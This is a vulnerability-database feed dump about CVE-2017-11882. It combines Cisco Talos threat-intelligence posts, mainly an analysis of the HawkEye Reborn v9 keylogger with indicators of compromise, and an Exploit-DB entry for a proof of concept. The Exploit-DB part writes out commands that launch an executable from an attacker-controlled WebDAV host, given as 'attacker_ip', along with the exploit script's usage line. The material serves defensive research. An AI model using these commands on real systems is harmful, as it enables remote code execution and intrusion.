([WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall ([NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)), Next-Generation Intrusion Prevention System ([NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firepower Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n### Indicators of Compromise\n\n**Hashes ** \n418379fbfe7e26117a36154b1a44711928f52e33830c6a8e740b66bcbe63ec61 \n50195be1de27eac67dd3e5918e1fc80acaa16159cb48b4a6ab9451247b81b649 \n6b2c71bfc5d2e85140b87c801d82155cd9abd97f84c094570373a9620e81cee0 \n6be18e3afeec482c79c9dea119d11d9c1598f59a260156ee54f12c4d914aed8f \n6e6e7ac84b1b0a0ae833ef2cb56592e1a7efc00ffad9b06bce7e676befc84185 \nb2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93 \n \n**URLs** \nhxxp://droobox[.]online/luncher.doc \nhxxp://msdn[.]cloud/FC001/JOHN \nhxxp://search-bing[.]site/FC003/User=H6szn1woY2pLV \n \n**Domains** \nmsdn[.]cloud \nsearch-bing[.]site \ndroobox[.]online \n \n\n\n", "modified": "2019-06-05T00:45:28", "published": "2019-06-05T00:45:28", "id": "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/RSmsHWqrgpk/frankenstein-campaign.html", "type": "talosblog", "title": "It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-24T16:19:06", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "[](<https://3.bp.blogspot.com/-fsip1EtsTi8/XLSoJ5Dy5zI/AAAAAAAABA0/0RFLYl6M7gEkd5gJZ7ny8_6CqYGQdB2PACLcBGAs/s1600/image2.jpg>)\n\n_[Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>) and [Holger Unterbrink](<http://blogs.cisco.com/author/holgerunterbrink>) authored this blog post._ \n \n\n\n## Executive summary\n\n \nMalware designed to steal sensitive information has been a threat to organizations around the world for a long time. The emergence of the greyware market and the increased commercialization of keyloggers, stealers, and remote access trojans (RATs) has magnified this threat by reducing the barrier to entry for attackers. In many cases, the adversaries leveraging these tools do not need to possess programming skills or in-depth computer science expertise, as they are now being provided as commercial offerings across the cybercriminal underground. We have previously released in-depth analyses of these types of threats and how malicious attackers are leveraging them to attack organizations with [Remcos in August](<https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html>) and [Agent Tesla in October](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>). \n \nHawkEye is another example of a malware kit that is actively being marketed across various hacking forums. Over the past several months, Talos observed ongoing malware distribution campaigns attempting to leverage the latest version of the HawkEye keylogger/stealer, HawkEye Reborn v9, against organizations to steal sensitive information and account credentials for use in additional attacks and account compromise. \n \n\n\n## History of HawkEye\n\n \nHawkEye is a malware kit that has been around for several years and has seen continuous development and iterations since at least 2013. It is commonly sold on various hacking forums as a keylogger and stealer that can be used to monitor systems and exfiltrate information from those systems. It features robust stealing capabilities as it can be used to obtain sensitive information from a variety of different applications. This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP. Talos has recently identified several changes concerning HawkEye Reborn in the latest version, HawkEye Reborn v9. \n \nIn December 2018, a thread on HackForums described a change in the ownership and ongoing development of the HawkEye keylogger. \n\n\n[](<https://4.bp.blogspot.com/-YOKYK7nA_LY/XLSoPx3B5ZI/AAAAAAAABA4/nVJRW-hm9gwFnXSHqwa26gbdCOeKeCHRACLcBGAs/s1600/image28.png>)\n\nShortly following this exchange, new posts began to appear that were attempting to market and sell new versions of HawkEye (HawkEye Reborn v9), with these new posts also referencing the change in ownership of the project moving forward. \n\n\n[](<https://2.bp.blogspot.com/-PfHSLXhS3v4/XLSoUi-yi5I/AAAAAAAABA8/NqfT1TqiwpwI-Tj1l_jE6N_RakRkUitMgCLcBGAs/s1600/image14.png>)\n\nHawkEye Reborn v9 is currently marketed as an \"Advance Monitoring Solution.\" It is currently being sold using a licensing model, with purchasers gaining access to the software and updates for different periods based on a tiered pricing model. \n\n\n[](<https://3.bp.blogspot.com/-nVLC2xeWfVY/XLSoY_zVwmI/AAAAAAAABBA/ShgUQIkoEccFQNv-bKaJzZloYx-CmeL1wCLcBGAs/s1600/image19.png>)\n\nHawkEye Reborn v9 also features a Terms of Service agreement that provides some additional insight. While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries. \n\n\n[](<https://1.bp.blogspot.com/-QjcANPSbXuw/XLSoeG7OXuI/AAAAAAAABBI/01cQGbAPI1AJHT_qLW26wZP62FMNLjhPQCLcBGAs/s1600/image23.png>)\n\nFollowing these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts. \n\n\n[](<https://2.bp.blogspot.com/-XCF0ooXwiMQ/XLSojXSxjlI/AAAAAAAABBQ/EWx_PUY1XD0y1x7eMww8ZA675YR8IDQDQCLcBGAs/s1600/image21.png>)\n\nAs with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world. \n \n\n\n## Distribution campaigns\n\n \nFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer. The current version, HawkEye Reborn v9 has been modified from earlier versions and heavily obfuscated to make analysis more difficult. \n \nThe email campaigns that have been observed feature characteristics that are consistent with what is commonly seen with malspam campaigns, with the emails purporting to be associated with various documents such as invoices, bills of materials, order confirmations, and other corporate functions. An example of one of these emails is below: \n\n\n[](<https://4.bp.blogspot.com/-nnMClu2IVWQ/XLSonr4bazI/AAAAAAAABBY/-ux_RxNbshwLX1cR8plybcXGpjlp6PyegCLcBGAs/s1600/image7.jpg>)\n\n**Figure 1: Example email message**\n\n \nWhile the current email contains leverage malicious Microsoft Excel files, earlier campaigns have also been observed leveraging RTF and DOC files. Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves. \n\n\n[](<https://2.bp.blogspot.com/-QS6w_CksYJs/XLSosxC-zcI/AAAAAAAABBg/Mjq0cA5nUYIkcUJEQnYgAA27KhpICx4zgCLcBGAs/s1600/image24.png>)\n\n**Figure 2: Example malicious Excel document**\n\n \nSimilar to the technique described in our previous blog about [Remcos](<https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html>), the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents. \n \nAnother interesting characteristic of the malicious documents is that the metadata associated with the document files themselves also matches that found in many of the malicious documents that were previously being used to spread Remcos. \n\n\n[](<https://4.bp.blogspot.com/-ucQKz5uGWps/XLSozJq9_cI/AAAAAAAABBo/FPmc6M0EjvgWn5B8KZr_qy9GkdM_LIkWgCLcBGAs/s1600/image13.jpg>)\n\n**Figure 3: Document metadata**\n\n \nAdditionally, the creation and modification dates associated with these documents are shortly after we released a detailed analysis of Remcos distribution campaigns that were being observed throughout 2018. \n \nAssuming the victim opens the attachment, the infection process begins as described in the following section. \n \nMany of the distribution servers that are being used to host the HawkEye keylogger binaries that are retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections that they are being used to facilitate. In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers. \n \n\n\n## Analysis of HawkEye Reborn \n\n \nThe campaign starts with sending the aforementioned Excel sheets that exploit the well-known [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) vulnerability, an arbitrary code execution bug in Microsoft Office. The exploit works similarly to what we saw with [Agent Tesla](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>) in October. It leverages a buffer overflow in the Equation Editor, which occurs if someone hands over a font name that's too long. The shellcode starts after the MTEF font tag \"08 13 36\" in this case. \n\n\n[](<https://2.bp.blogspot.com/-WxpBsP6lNWE/XLSo72CB_NI/AAAAAAAABBw/lwshDjqrrmwa1uNBL63iEJXMeCS2fPe5wCLcBGAs/s1600/image20.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-Ezp3PrHQB8A/XLSo_0PmDuI/AAAAAAAABB4/8Cmnfu03C4MFXU30HbMix6j2WLSa9oC9gCLcBGAs/s1600/image3.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-BPF8a9brsno/XLSpEO0fCKI/AAAAAAAABB8/aDnt1WNHhCQHZzG96-uuWb9biTU83DwRwCLcBGAs/s1600/image25.png>)\n\nAfter execution in the Equation Editor (EQNEDT32.EXE) context, it downloads the malicious data from the malware server as you can see in the ThreatGrid Process Timeline screenshot below. After a successful download, it creates and starts the RegAsm.exe process. \n\n\n[](<https://3.bp.blogspot.com/-8C-Z3N_cEcE/XLSpIWEPIaI/AAAAAAAABCA/oAzHtM2VkH42DpaxRfozcgNRGAMWFWDUQCLcBGAs/s1600/image22.png>)\n\nThis RegAsm.exe process is a heavily obfuscated AutoIT script compiled into a PE. After decompiling it from the PE file, it is heavily obfuscated and still almost unreadable. \n\n\n[](<https://2.bp.blogspot.com/-LAeWp4klBQM/XLSpNQSmlgI/AAAAAAAABCE/Taj11GUjky0vQyQkYi3-adDUhQwDhaq8ACLcBGAs/s1600/image16.png>)\n\nWe deobfuscated the script to understand how the infection process works. It first creates the \"winrshost\" mutex. Then, it extracts the final payload malware from two objects in the PE resource section (capisp1, appsruprov2). \n\n\n[](<https://3.bp.blogspot.com/-LkoKmpYlZI8/XLSpSlAwVFI/AAAAAAAABCI/3imcGZdkdSYvAdyXyLULSvqBOIUWrzc1ACLcBGAs/s1600/image31.png>)\n\nIt concatenates them and uses AES to decrypt the result, using the hardcoded key \"pydbdio\u2026\" which is handed over to the DecryptData function (see above). The screen capture below shows the decryption function. \n\n\n[](<https://4.bp.blogspot.com/-KJKN9kXAelA/XLSpWqvttxI/AAAAAAAABCQ/6VvUkgSF91864qKaULizw0llm4Wat7_CwCLcBGAs/s1600/image30.png>)\n\nIt then calls the StartAndPatchRegAsm function. \n\n\n[](<https://1.bp.blogspot.com/-VDSLuvBYhCE/XLSpacgofmI/AAAAAAAABCY/YK7E0pWtUpkaJEyZ_7AZrigJTR28NOU1gCLcBGAs/s1600/image5.png>)\n\nThis function tries to find the original Microsoft RegAsm executable path. It hands over the decrypted buffer extracted from the resource section and the path from the original RegAsm executable to the start_protect_hexcode function. \n\n\n[](<https://4.bp.blogspot.com/-w-kCXgz3u0o/XLSpeBlFHnI/AAAAAAAABCg/JKhf2gJXxgQbeRTam8rQd2GPf10pYTpMwCLcBGAs/s1600/image18.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-ZTDot3VU9JU/XLSphqlp3mI/AAAAAAAABCk/bCasK40QdFAp0Gh4wVivdix4YJr-ZOCtgCLcBGAs/s1600/image26.png>)\n\nThen it starts the process-hollowing shellcode, which is stored in the HEXCODE1 variable. This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process. The shellcode in HEXCODE1 is very similar to this [RunPE](<https://github.com/Zer0Mem0ry/RunPE/blob/master/RunPE.cpp>) example. \n \nThe AutoIT script is offering a lot of other functions which are not used in this campaign, like anti-virtual machine detection, USB drive infection and others. \n\n\n[](<https://3.bp.blogspot.com/-vh6Xq3TzaqE/XLSqd44BI8I/AAAAAAAABC8/gyzDKfaB2LgXQ41UHSI30LB90bSp5h91QCLcBGAs/s1600/image29.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-IuVHzBC8njQ/XLSqhnzC8VI/AAAAAAAABDA/sOxJqPwVPKsiWUJKATHD0oUYlsAJbPInQCLcBGAs/s1600/image27.png>)\n\nThe final payload \u2014 which we found in the AutoIT PE file resource section and was started by the process-hollowing shellcode \u2014 is a .NET PE file that's obfuscated with ConfuserEx. \n\n\n[](<https://4.bp.blogspot.com/-u3hzMzatksk/XLSqmJo1I3I/AAAAAAAABDE/uGg8D0kUXDQzoWy8CP7zLIm210QMK3geQCLcBGAs/s1600/image17.png>)\n\nDeobfuscated, we can see it is the HawkEye Keylogger \u2014 Reborn v9, Version=9.0.1.6. \n \nWhen HawkEye is executed, in line 34, \n\n \n \n byte[] byte_ = gclass.method_0()[\"0\", GClass30.GEnum3.RCDATA].Byte_0;\n\nit reads the encrypted configuration from the RCDATA resource and in line 33, \n\n \n \n byte[] byte_2 = GClass29.smethod_12(byte_, GClass12.string_0);\n\nand then decrypts this data with the Rijndael algorithm you can see below in the RijndaelManaged function to initialize the HawkEye configuration settings. \n\n\n[](<https://3.bp.blogspot.com/-iXF2q1vPsH0/XLSqqwTAYlI/AAAAAAAABDI/QmDPS_rDMvs2FAsIKCxge5wi1Ymvy_igACLcBGAs/s1600/image8.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-dBd_LGk0GoU/XLSqujXRU2I/AAAAAAAABDM/nepniWiNAvssUFbZVBvTGEDstHQE-LC2gCLcBGAs/s1600/image15.png>)\n\nThe decrypted configuration shows us the account used for exfiltration: \n\n\n[](<https://1.bp.blogspot.com/-rHobq8SN4Ek/XLSq48SpP2I/AAAAAAAABDU/z81o8uAi_iUBte3aHusudOYT_dxsY0u0QCLcBGAs/s1600/image32.png>)\n\nThe main loop of HawkEye has the following functions: \n\n\n[](<https://3.bp.blogspot.com/-W9wmLGo3GCc/XLSq9HXTuLI/AAAAAAAABDc/sEzmCGsiRl0bdeuCiodV5pX0ZGis4OkrACLcBGAs/s1600/image1.png>)\n\nThis shows the rich feature set of HawkEye. The adversaries can get detailed information about the victim's machine, as you can see in the screenshot below. \n\n\n[](<https://1.bp.blogspot.com/-F1wPT8D1q04/XLSrBOdeGEI/AAAAAAAABDg/APiAE7rXSDsd8oJxaJgoQzUJjevl11gQgCLcBGAs/s1600/image11.png>)\n\nBeside the system information, it steals passwords from common web browsers, Filezilla, Beyluxe Messenger, CoreFTP and the video game \"Minecraft.\" It also starts a keylogger, steals clipboard content, takes screenshots from the desktop and pictures from the webcam. \n \nVersion 9 is still using the well-known MailPassView and WebBrowserPassView freeware tools from [Nirsoft](<http://www.nirsoft.net/>) to steal web and email passwords. These tools are embedded in the PE file in the form of data which is decoded at runtime and added to the local resources. Then, they are using the process hollowing technique to hide the execution of these tools inside of the original Microsoft vbc.exe (VisualBasic Compiler) process. They are starting an instance of vbc.exe via ProcessCreate, injecting the tool and resume the threat. The stolen passwords are ending up in a temporary file, which is read in and added to the list of data to be exfiltrated. HawkEye offers the following exfiltration options based on the configuration: email, FTP, SFTP, HTTP POST to PanelURL API or ProxyURL. \n\n\n[](<https://2.bp.blogspot.com/-yoXzehs_JDk/XLSrFzfBKRI/AAAAAAAABDk/JoTgkmSCuR0doPgen3wWwGnVQ2LnWlrrACLcBGAs/s1600/image9.png>)\n\nAs mentioned above, in the comments of the main loop section, it also comes with several anti-analysis features, including starting an anti-debugging thread or disabling certain AV-related programs via the Image File Execution Options (IFEO) evasion technique by registering invalid debuggers that redirect and effectively disable various system and security applications. \n\n\n[](<https://4.bp.blogspot.com/-vjkuaPushUo/XLSrLErUWvI/AAAAAAAABDo/wTG74Vd6vPYKXhP0q0qaLukjx0vuxUvmQCLcBGAs/s1600/image6.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-Sp2PJW7BIq0/XLSrO9GaicI/AAAAAAAABDs/cLvxHbEJ2Oo70osruhvclw10eKOtRixKQCLcBGAs/s1600/image4.png>)\n\nThe following diagram summarizes the full infection process: \n\n\n[](<https://3.bp.blogspot.com/-zR71sgOYtYA/XLSrT_-UJ2I/AAAAAAAABDw/H1shNR4H5z0G6xXb_h9hK23wowyd2ySngCLcBGAs/s1600/image12.jpg>)\n\n \n\n\n## Conclusion\n\n \nRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward. HawkEye has been active across the threat landscape for a long time and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts. While the Terms of Service have been written in an attempt to absolve the developer of any wrongdoing, it is actively leveraged by malicious adversaries. Organizations should be aware of this and similar threats and deploy countermeasures such as Multi-Factor Authentication (MFA) solutions such as [Duo](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to help reduce the impact of credential theft within their environments. Talos continues to monitor this threat as it changes to ensure that customers remain protected from this and other threats as they continue to emerge and evolve. \n \n\n\n## Coverage\n\nAdditional ways our customers can detect and block this threat are listed below. \n \n\n\n[](<https://3.bp.blogspot.com/-mlMbcYQ3qsI/Wyn1AySpA-I/AAAAAAAAAZ4/nZhPWCs28ZcGmAw112w9dm8l47WVleUbwCLcBGAs/s1600/image1.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as [Next-Generation Firewall (](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## Indicators of compromise\n\n \nThe following IOCs are associated with various malware distribution campaigns that were observed during the analysis of Hawkeye Reborn v9 activity. \n \n\n\n### Attachment hashes (SHA256)\n\n \nA list of hashes observed to be associated with malicious email attachments can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5cb4afcf1be50.txt>). \n \n\n\n### PE32 hashes (SHA256)\n\n \nA list of hashes observed to be associated with malicious PE32 executables can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5cb4b004a5a27.txt>). \n \n\n\n### Domains\n\n \nThe following domains have been observed to be associated with malware campaigns. \n \ntfvn[.]com[.]vn \nshirkeswitch[.]net \nguideofgeorgia[.]org \ngulfclouds[.]site \njhssourcingltd[.]com \nkamagra4uk[.]com \npioneerfitting[.]com \npositronicsindia[.]com \nscseguros[.]pt \nspldernet[.]com \ntoshioco[.]com \nwww[.]happytohelpyou[.]in \n \n\n\n### IP addresses\n\n \nThe following IP addresses have been observed to be associated with malware campaigns. \n \n112.213.89[.]40 \n67.23.254[.]61 \n62.212.33[.]98 \n153.92.5[.]124 \n185.117.22[.]197 \n23.94.188[.]246 \n67.23.254[.]170 \n72.52.150[.]218 \n148.66.136[.]62 \n107.180.24[.]253 \n108.179.246[.]138 \n18.221.35[.]214 \n94.46.15[.]200 \n66.23.237[.]186 \n72.52.150[.]218 \n \n\n\n### URLs:\n\n \nThe following URLs have been observed to be associated with malware campaigns. \n \nhttps[:]//a[.]pomf[.]cat/ \nhttp[:]//pomf[.]cat/upload[.]php \n \n", "modified": "2019-04-16T11:45:39", "published": "2019-04-16T11:45:39", "id": "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/oyNpZ0C4orY/hawkeye-reborn.html", "type": "talosblog", "title": "New HawkEye Reborn Variant Emerges Following Ownership Change", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-11-21T03:00:56", "description": "Microsoft Office - OLE Remote Code Execution. CVE-2017-11882. Remote exploit for Windows platform", "published": "2017-11-20T00:00:00", "type": "exploitdb", "title": "Microsoft Office - OLE Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2017-11-20T00:00:00", "id": "EDB-ID:43163", "href": "https://www.exploit-db.com/exploits/43163/", "sourceData": "Source: https://github.com/embedi/CVE-2017-11882\r\n\r\nCVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/\r\n\r\nMITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882\r\n\r\nResearch: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about\r\n\r\nPatch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html\r\n\r\nDEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410\r\n\r\nwebdav_exec CVE-2017-11882\r\n\r\nA simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.\r\n\r\nThe first command which triggers WebClient service start may look like this:\r\n\r\ncmd.exe /c start \\\\attacker_ip\\ff\r\nAttacker controlled binary path should be a UNC network path:\r\n\r\n\\\\attacker_ip\\ff\\1.exe\r\nUsage\r\n\r\nwebdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name\r\nSample exploit for CVE-2017-11882 (starting calc.exe as payload)\r\n\r\nexample folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43163.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43163/"}]}